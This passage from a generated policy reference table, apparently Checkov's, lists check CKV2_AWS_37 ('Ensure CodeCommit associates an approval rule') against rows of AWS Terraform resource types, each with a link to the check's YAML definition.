CKV2_AWS_37 | resource | aws_lb_ssl_negotiation_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 903 | CKV2_AWS_37 | resource | aws_lb_target_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 904 | CKV2_AWS_37 | resource | aws_lb_target_group_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 905 | CKV2_AWS_37 | resource | aws_licensemanager_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 906 | CKV2_AWS_37 | resource | aws_licensemanager_license_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 907 | CKV2_AWS_37 | resource | aws_lightsail_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 908 | CKV2_AWS_37 | resource | aws_lightsail_instance | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 909 | CKV2_AWS_37 | resource | aws_lightsail_key_pair | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 910 | CKV2_AWS_37 | resource | aws_lightsail_static_ip | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 911 | CKV2_AWS_37 | resource | aws_lightsail_static_ip_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 912 | CKV2_AWS_37 | resource | aws_load_balancer_backend_server_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 913 | CKV2_AWS_37 | resource | aws_load_balancer_listener_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 914 | CKV2_AWS_37 | resource | aws_load_balancer_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 915 | CKV2_AWS_37 | resource | 
aws_macie_member_account_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 916 | CKV2_AWS_37 | resource | aws_macie_s3_bucket_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 917 | CKV2_AWS_37 | resource | aws_main_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 918 | CKV2_AWS_37 | resource | aws_media_convert_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 919 | CKV2_AWS_37 | resource | aws_media_package_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 920 | CKV2_AWS_37 | resource | aws_media_store_container | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 921 | CKV2_AWS_37 | resource | aws_media_store_container_policy | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 922 | CKV2_AWS_37 | resource | aws_mq_broker | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 923 | CKV2_AWS_37 | resource | aws_mq_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 924 | CKV2_AWS_37 | resource | aws_msk_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 925 | CKV2_AWS_37 | resource | aws_msk_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 926 | CKV2_AWS_37 | resource | aws_nat_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 927 | CKV2_AWS_37 | resource | aws_neptune_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 928 | CKV2_AWS_37 | resource | aws_neptune_cluster_instance | Ensure CodeCommit associates an approval rule | 
Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 929 | CKV2_AWS_37 | resource | aws_neptune_cluster_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 930 | CKV2_AWS_37 | resource | aws_neptune_cluster_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 931 | CKV2_AWS_37 | resource | aws_neptune_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 932 | CKV2_AWS_37 | resource | aws_neptune_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 933 | CKV2_AWS_37 | resource | aws_neptune_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 934 | CKV2_AWS_37 | resource | aws_network_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 935 | CKV2_AWS_37 | resource | 
aws_network_acl_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 936 | CKV2_AWS_37 | resource | aws_network_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 937 | CKV2_AWS_37 | resource | aws_network_interface_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 938 | CKV2_AWS_37 | resource | aws_network_interface_sg_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 939 | CKV2_AWS_37 | resource | aws_opsworks_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 940 | CKV2_AWS_37 | resource | aws_opsworks_custom_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 941 | CKV2_AWS_37 | resource | aws_opsworks_ganglia_layer | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 942 | CKV2_AWS_37 | resource | aws_opsworks_haproxy_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 943 | CKV2_AWS_37 | resource | aws_opsworks_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 944 | CKV2_AWS_37 | resource | aws_opsworks_java_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 945 | CKV2_AWS_37 | resource | aws_opsworks_memcached_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 946 | CKV2_AWS_37 | resource | aws_opsworks_mysql_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 947 | CKV2_AWS_37 | resource | aws_opsworks_nodejs_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 948 | CKV2_AWS_37 | resource | aws_opsworks_permission | 
Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 949 | CKV2_AWS_37 | resource | aws_opsworks_php_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 950 | CKV2_AWS_37 | resource | aws_opsworks_rails_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 951 | CKV2_AWS_37 | resource | aws_opsworks_rds_db_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 952 | CKV2_AWS_37 | resource | aws_opsworks_stack | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 953 | CKV2_AWS_37 | resource | aws_opsworks_static_web_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 954 | CKV2_AWS_37 | resource | aws_opsworks_user_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 955 
| CKV2_AWS_37 | resource | aws_organizations_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 956 | CKV2_AWS_37 | resource | aws_organizations_organization | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 957 | CKV2_AWS_37 | resource | aws_organizations_organizational_unit | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 958 | CKV2_AWS_37 | resource | aws_organizations_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 959 | CKV2_AWS_37 | resource | aws_organizations_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 960 | CKV2_AWS_37 | resource | aws_pinpoint_adm_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 961 | CKV2_AWS_37 | resource | aws_pinpoint_apns_channel | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 962 | CKV2_AWS_37 | resource | aws_pinpoint_apns_sandbox_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 963 | CKV2_AWS_37 | resource | aws_pinpoint_apns_voip_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 964 | CKV2_AWS_37 | resource | aws_pinpoint_apns_voip_sandbox_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 965 | CKV2_AWS_37 | resource | aws_pinpoint_app | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 966 | CKV2_AWS_37 | resource | aws_pinpoint_baidu_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 967 | CKV2_AWS_37 | resource | aws_pinpoint_email_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 968 | CKV2_AWS_37 | resource | 
aws_pinpoint_event_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 969 | CKV2_AWS_37 | resource | aws_pinpoint_gcm_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 970 | CKV2_AWS_37 | resource | aws_pinpoint_sms_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 971 | CKV2_AWS_37 | resource | aws_placement_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 972 | CKV2_AWS_37 | resource | aws_proxy_protocol_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 973 | CKV2_AWS_37 | resource | aws_qldb_ledger | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 974 | CKV2_AWS_37 | resource | aws_quicksight_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 
975 | CKV2_AWS_37 | resource | aws_quicksight_user | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 976 | CKV2_AWS_37 | resource | aws_ram_principal_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 977 | CKV2_AWS_37 | resource | aws_ram_resource_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 978 | CKV2_AWS_37 | resource | aws_ram_resource_share | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 979 | CKV2_AWS_37 | resource | aws_ram_resource_share_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 980 | CKV2_AWS_37 | resource | aws_rds_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 981 | CKV2_AWS_37 | resource | aws_rds_cluster_endpoint | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 982 | CKV2_AWS_37 | resource | aws_rds_cluster_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 983 | CKV2_AWS_37 | resource | aws_rds_cluster_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 984 | CKV2_AWS_37 | resource | aws_rds_global_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 985 | CKV2_AWS_37 | resource | aws_redshift_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 986 | CKV2_AWS_37 | resource | aws_redshift_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 987 | CKV2_AWS_37 | resource | aws_redshift_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 988 | CKV2_AWS_37 | resource | aws_redshift_security_group | 
Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 989 | CKV2_AWS_37 | resource | aws_redshift_snapshot_copy_grant | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 990 | CKV2_AWS_37 | resource | aws_redshift_snapshot_schedule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 991 | CKV2_AWS_37 | resource | aws_redshift_snapshot_schedule_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 992 | CKV2_AWS_37 | resource | aws_redshift_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 993 | CKV2_AWS_37 | resource | aws_resourcegroups_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 994 | CKV2_AWS_37 | resource | aws_root | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | 
-| 995 | CKV2_AWS_37 | resource | aws_root_access_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 996 | CKV2_AWS_37 | resource | aws_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 997 | CKV2_AWS_37 | resource | aws_route53_delegation_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 998 | CKV2_AWS_37 | resource | aws_route53_health_check | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 999 | CKV2_AWS_37 | resource | aws_route53_query_log | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1000 | CKV2_AWS_37 | resource | aws_route53_record | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1001 | CKV2_AWS_37 | resource | aws_route53_resolver_endpoint | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1002 | CKV2_AWS_37 | resource | aws_route53_resolver_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1003 | CKV2_AWS_37 | resource | aws_route53_resolver_rule_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1004 | CKV2_AWS_37 | resource | aws_route53_vpc_association_authorization | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1005 | CKV2_AWS_37 | resource | aws_route53_zone | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1006 | CKV2_AWS_37 | resource | aws_route53_zone_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1007 | CKV2_AWS_37 | resource | aws_route_table | Ensure CodeCommit associates an approval rule | Terraform | 